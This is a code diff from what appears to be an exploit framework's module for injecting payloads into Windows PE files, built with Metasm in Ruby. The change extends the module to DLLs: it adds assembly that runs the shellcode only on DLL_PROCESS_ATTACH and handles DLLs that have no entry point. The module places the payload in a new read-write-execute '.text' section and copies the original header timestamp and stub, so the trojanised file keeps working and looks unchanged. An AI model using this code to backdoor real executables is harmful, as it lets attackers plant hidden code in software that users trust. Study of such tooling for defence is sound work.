@@ -31,7 +31,6 @@ def processor
3131
3232 def create_thread_stub
3333 <<-EOS
34- hook_entrypoint:
3534 pushad
3635 push hook_libname
3736 call [iat_LoadLibraryA]
@@ -68,8 +67,9 @@ def payload_as_asm
6867 return asm
6968 end
7069
71- def payload_stub
72- asm = create_thread_stub
70+ def payload_stub ( prefix )
71+ asm = "hook_entrypoint:\n #{ prefix } \n "
72+ asm << create_thread_stub
7373 asm << payload_as_asm
7474 shellcode = Metasm ::Shellcode . assemble ( processor , asm )
7575 shellcode . encoded
@@ -85,14 +85,34 @@ def generate_pe
8585 pe . mz . encoded . export = pe_orig . encoded [ 0 , 512 ] . export . dup
8686 pe . header . time = pe_orig . header . time
8787
88+ prefix = ''
89+ if pe . header . characteristics . include? "DLL"
90+ # if there is no entry point, just return after we bail or spawn shellcode
91+ if pe . optheader . entrypoint == 0
92+ prefix = "cmp [esp + 8], 1
93+ jz spawncode
94+ entrypoint:
95+ xor eax, eax
96+ inc eax
97+ ret 0x0c
98+ spawncode:"
99+ else
100+ # there is an entry point, we'll need to go to it after we bail or spawn shellcode
101+ # if fdwReason != DLL_PROCESS_ATTACH, skip the shellcode, jump back to original DllMain
102+ prefix = "cmp [esp + 8], 1
103+ jnz entrypoint"
104+ end
105+ end
88106 # Generate a new code section set to RWX with our payload in it
89107 s = Metasm ::PE ::Section . new
90108 s . name = '.text'
91- s . encoded = payload_stub
109+ s . encoded = payload_stub prefix
92110 s . characteristics = %w[ MEM_READ MEM_WRITE MEM_EXECUTE ]
93111
94112 # Tell our section where the original entrypoint was
95- s . encoded . fixup! ( 'entrypoint' => pe . optheader . image_base + pe . optheader . entrypoint )
113+ if pe . optheader . entrypoint != 0
114+ s . encoded . fixup! ( 'entrypoint' => pe . optheader . image_base + pe . optheader . entrypoint )
115+ end
96116 pe . sections << s
97117 pe . invalidate_header
98118
0 commit comments